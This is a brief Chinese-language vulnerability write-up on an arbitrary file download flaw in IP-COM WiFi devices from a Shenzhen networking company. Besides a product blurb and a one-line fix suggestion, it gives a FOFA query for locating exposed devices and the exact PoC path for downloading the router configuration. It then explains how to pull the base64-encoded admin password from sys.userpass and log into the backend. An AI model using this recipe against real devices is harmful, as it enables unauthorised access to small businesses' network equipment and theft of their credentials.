Nx01 产品简介
深圳市和为顺网络技术有限公司是一家聚焦于商用级网络通信设备的研发与应用,为全球中小型企业提供高速、安全、易维护的网络设备产品和解决方案的公司。
Nx02 漏洞描述
深圳市和为顺网络技术有限公司IP-COM WiFi方案解决专家存在任意文件下载漏洞,攻击者可利用漏洞获取敏感信息。
Nx03 产品主页
fofa-query: web.title=="IP-COM | Login"
Nx04 漏洞复现
POC:
/cgi-bin/DownloadCfg/RouterCfm.cfg
搜索sys.userpass参数获取base加密密码进行登录后台。
Nx05 修复建议
建议联系软件厂商进行处理。
